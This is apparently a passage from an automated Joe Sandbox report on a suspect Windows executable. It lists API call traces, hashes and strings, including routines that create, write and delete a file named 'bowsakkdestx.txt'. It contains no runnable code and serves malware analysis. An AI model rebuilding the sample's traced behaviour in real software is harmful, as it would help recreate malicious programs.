                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                • String ID:
                                • API String ID: 1380987712-0
                                • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                APIs
                                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                • DispatchMessageW.USER32(?), ref: 0041FA7B
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                • String ID:
                                • API String ID: 1380987712-0
                                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                APIs
                                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                • DispatchMessageW.USER32(?), ref: 0041FE2B
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                • String ID:
                                • API String ID: 1380987712-0
                                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcsnlen
                                • String ID: U
                                • API String ID: 3628947076-3372436214
                                • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: .\crypto\buffer\buffer.c$C7F
                                • API String ID: 2102423945-2013712220
                                • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                APIs
                                Strings
                                • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: StringUuid$CreateFree
                                • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                • API String ID: 3044360575-2335240114
                                • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$AppendFolder
                                • String ID: bowsakkdestx.txt
                                • API String ID: 29327785-2616962270
                                • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                APIs
                                • _malloc.LIBCMT ref: 00423B64
                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                • std::exception::exception.LIBCMT ref: 00423B82
                                • __CxxThrowException@8.LIBCMT ref: 00423B97
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                • String ID: bad allocation
                                • API String ID: 3074076210-2104205924
                                • Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                • Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                APIs
                                • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCursorLoadRegister
                                • String ID: 0$LPCWSTRszWindowClass
                                • API String ID: 1693014935-1496217519
                                • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$AppendDeleteFileFolder
                                • String ID: bowsakkdestx.txt
                                • API String ID: 610490371-2616962270
                                • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: p2Q
                                • API String ID: 2102423945-1521255505
                                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove_strtok
                                • String ID:
                                • API String ID: 3446180046-0
                                • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                • String ID:
                                • API String ID: 2974526305-0
                                • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                APIs
                                • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleWritelstrlen
                                • String ID:
                                • API String ID: 1421093161-0
                                • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                  • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                  • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                • CallCatchBlock.LIBCMT ref: 004C70F8
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                • String ID:
                                • API String ID: 2901542994-0
                                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                APIs
                                  • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                  • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                • __calloc_crt.LIBCMT ref: 00425A01
                                  • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                • __lock.LIBCMT ref: 00425A37
                                • ___addlocaleref.LIBCMT ref: 00425A43
                                • __lock.LIBCMT ref: 00425A57
                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                • String ID:
                                • API String ID: 2580527540-0
                                • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                APIs
                                • lstrlenW.KERNEL32 ref: 004127B9
                                • _malloc.LIBCMT ref: 004127C3
                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                • _memset.LIBCMT ref: 004127CE
                                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                • String ID:
                                • API String ID: 2824100046-0
                                • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                APIs
                                • lstrlenA.KERNEL32 ref: 00412806
                                • _malloc.LIBCMT ref: 00412814
                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                • _memset.LIBCMT ref: 0041281F
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                • String ID:
                                • API String ID: 2824100046-0
                                • Opcode ID: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                • Opcode Fuzzy Hash: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                APIs
                                Strings
                                Memory Dump Source
